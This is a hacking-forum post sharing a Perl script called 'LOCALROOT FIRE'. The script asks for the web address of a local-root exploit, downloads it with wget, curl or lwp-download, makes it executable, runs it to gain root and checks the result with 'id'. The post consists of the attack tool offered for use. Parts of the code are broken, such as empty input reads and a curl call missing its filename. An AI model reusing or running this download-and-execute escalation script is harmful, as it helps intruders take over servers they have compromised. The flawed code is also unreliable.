• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Perl localroot fire

Status
Not open for further replies.

sQuo

~ KillmeMories ~
Shadow
User
Joined
Oct 16, 2011
Messages
5,851
Reputation
0
Reaction score
22,904
Points
688
Credits
0
‎13 Years of Service‎
24%
 


LOCALROOT FIRE



C0ded by silent



This Script Helps You To Upload Your Local R00t



Simply.


Code:
>#!/user/local/bin/perl 

system('cls');
system('title LOCALROOT FIRE BY silent');

print q (
--------------------------------------------------------------------
|                         LOCALROOT FIRE
|                       C0ded  by  silent
|          This Script Helps You To Upload Your Local R00t
|                            Simply.
--------------------------------------------------------------------
);

sleep 1;

print q (



                               /^
                      _.-`:   /   \   :'-._
                    ,`    :  |     |  :    '.
                  ,`       \,| ROOT|,/       '.
                 /           `-...-`           
                :              .'.              :
                |     LOCAL   . ' .     FIRE    |
                |             ' . '             |
                :              '.'              :
                            ,-'''-,           /
                  `.       /'|     |'\       ,'
                    `._   ;  |     |  ;   _,'
                       `-.:  |     |  :,-
                             |     |
                             |     |
                             |     |
                             |     |
                             |     |

);

sleep 1;

print "\n\nLOCALROOT FIRE IS STARTING \n\n";

sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t.";

sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t.";

sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t.";

print "\n\n------------------------------------------------------------------------";

print "\n\n The kernel version is here ~~> ";

system ("uname -a");

print "\n\n ok \n\n";

print "\n\n Enter Local R00t Address(without Local R00t Name)\n\n[EX: http://www.site.com/mylocalroot/]: \n ~~> ";
$local = ;
chop $local;

sleep 1; print "\n\t\t"; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t."; sleep 1; print "\n\t\t.";

print "\n\n Enter The Local Root Name (the name that was in the local r00t address): \n ~~> ";
$name = ;
chop $name;

$localroot = $local.$name;

print " Your localroot Address Is ==> \t $localroot \n\n\n";

sleep 1;

print q (
=====================================================================
[+] Dawnload Local Root with wget method Write : wget
[+] Dawnload Local Root with curl method Write : curl
[+] Dawnload Local Root with lwp-download method Write : lwp-download
=====================================================================
);

sleep 1; 



print "\n\n Enter the method for download localr00t \n\n ~~> ";
$method = ;
chop $method;

if ($method eq "wget"){

system ("cd /tmp");

system ("mkdir silent");

system ("chmod 777 silent");

system ("cd silent");

system ("wget $localroot");

sleep 5;

system ("chmod 777 $name");

system ("./$name");


print "\n\nYou Will be r00t now!\n\n";


system ("id");


print "\n\n If You Arent r00t now use another method ";

print "\n\n Maybe the script couldnt download your localr00t \n !!!!!!!!! ";

print "\n\n If You are root .... I should say congratulation";

}



if ($method eq "curl"){

system ("cd /tmp");

system ("mkdir silent");

system ("chmod 777 silent");

system ("cd silent");

system ("curl -o $localroot");

sleep 5;

system ("chmod 777 $name");

system ("./$name");


print "\n\nYou Will be r00t now!\n\n";


system ("id");


print "\n\n If You Arent r00t now use another method ";

print "\n\n Maybe the script couldnt download your localr00t \n !!!!!!!!! ";

print "\n\n If You are root .... I should say congratulation";

}




if ($method eq "lwp-download"){

system ("cd /tmp");

system ("mkdir silent");

system ("chmod 777 silent");

system ("cd silent");

system ("lwp-download -a $localroot");

sleep 5;

system ("chmod 777 $name");

system ("./$name");


print "\n\nYou Will be r00t now!\n\n";


system ("id");


print "\n\n If You Arent r00t now use another method ";

print "\n\n Maybe the script couldnt download your localr00t \n !!!!!!!!! ";

print "\n\n If You are root .... I should say congratulation";

}
 
Status
Not open for further replies.
Back
Top